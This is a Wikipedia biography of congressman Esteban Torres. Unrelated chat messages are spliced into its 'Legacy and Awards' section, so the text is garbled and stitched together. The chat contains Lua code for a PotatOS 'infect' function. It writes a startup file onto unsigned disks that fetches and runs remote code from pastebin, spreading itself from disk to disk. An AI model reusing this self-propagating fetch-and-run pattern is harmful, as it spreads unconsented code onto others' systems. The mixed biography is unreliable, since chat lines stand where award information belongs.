Esteban Edward Torres

Esteban Edward Torres (born January 27, 1930) is a U.S. politician who served as member of the United States House of Representatives for California's 34th congressional district from 1983-1999.[1]

Esteban Torres
Member of the U.S. House of Representatives
from California's 34th district
In office
January 3, 1983  January 3, 1999
Preceded byDan Lungren
Succeeded byGrace Napolitano
Personal details
Born (1930-01-27) January 27, 1930
Miami, Arizona, U.S.
Political partyDemocratic
Spouse(s)Arcy Sanchez
EducationEast Los Angeles College
California State University, Los Angeles
University of Maryland, College Park
American University

Personal

Torres was born in Miami, Arizona, to parents from Mexico. He was raised mostly by his mother, Rena Gómez. His father was a miner, but was deported to Mexico.[2]

Career

Torres served in the United States Army from 1949 to 1953. Active in the labor movement, he was appointed United States Ambassador to the United Nations Educational, Scientific and Cultural Organization (UNESCO), Paris, France, from 1977 to 1979 and served as a special assistant to President Jimmy Carter from 1979 to 1981.[1]

Torres was unsuccessful in his attempt to win a seat in the House of Representatives in 1974, but was elected in 1982 as a Democrat. He served from 1983 until 1999. He did not run for reelection in 1998 and was succeeded by Democrat Grace Napolitano. He served as a member of the California Transportation Commission[3] from 1997 to 2007.

Legacy and Awards

gollark: Um, no, that's not how it works.
gollark: Quick summary:- valid disks contain a signature file and a startup- the signature can be in the old table format or hexadecimal- only disks where the signature is valid for the code on them are executed
gollark: The relevant code:```lualocal function infect(disk_side) local mp = disk.getMountPath(disk_side) if not mp then return end local ds = fs.combine(mp, "startup") -- Find paths to startup and signature files local disk_ID = disk.getID(disk_side) local sig_file = fs.combine(mp, "signature") -- shell.run disks marked with the Brand of PotatOS -- except not actually, it's cool and uses load now if fs.exists(ds) and fs.exists(sig_file) then local code = fread(ds) local sig_raw = fread(sig_file) local sig if sig_raw:find "{" then sig = textutils.unserialise(sig_raw) else sig = unhexize(sig_raw) end disk.eject(disk_side) if verify(code, sig) then -- run code, but safely (via pcall) -- print output for debugging print "Signature Valid; PotatOS Disk Loading" local out, err = load(code, "@disk/startup", nil, external_env) if not out then printError(err) else local ok, res = pcall(out, { side = disk_side, mount_path = mp, ID = disk_ID }) if ok then print(textutils.serialise(res)) else printError(res) end end else printError "Invalid Signature!" printError "Initiating Procedure 5." end -- if they're not PotatOS'd, write it on else fwrite(ds, "shell.run 'pastebin run RM13UGFa update' -- PotatOS") endend```
gollark: <@151391317740486657> What key exactly?
gollark: <@151391317740486657> Only digitally signed ones are run unsandboxed. You cannot sign a disk without the private key or probably utterly impractical hackery.

See also

References

  1. "Esteban Torres". Hispanic Americans in Congress. Library of Congress. Retrieved 2016-03-04.
  2. Sierra, José Luis (2004-11-12). "Chopped Lives". La Opinion. Archived from the original on 2007-08-14. Retrieved 2007-08-14.
  3. "Commissioners". California Transportation Commission (CTC). Archived from the original on 2016-09-07. Retrieved 2006-09-18.
  4. Colón, Melissa (2018). "C.V." (PDF). Retrieved 2019-06-19. the Esteban E. Torres Fellowship, a fellowship for Harvard’s John F. Kennedy School of Government Cite journal requires |journal= (help)
U.S. House of Representatives
Preceded by
Dan Lungren
Member of the U.S. House of Representatives
from California's 34th congressional district

1983–1999
Succeeded by
Grace Napolitano
Preceded by
Matthew G. Martínez
Chair of the Congressional Hispanic Caucus
1986–1987
Succeeded by
Albert Bustamante
This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.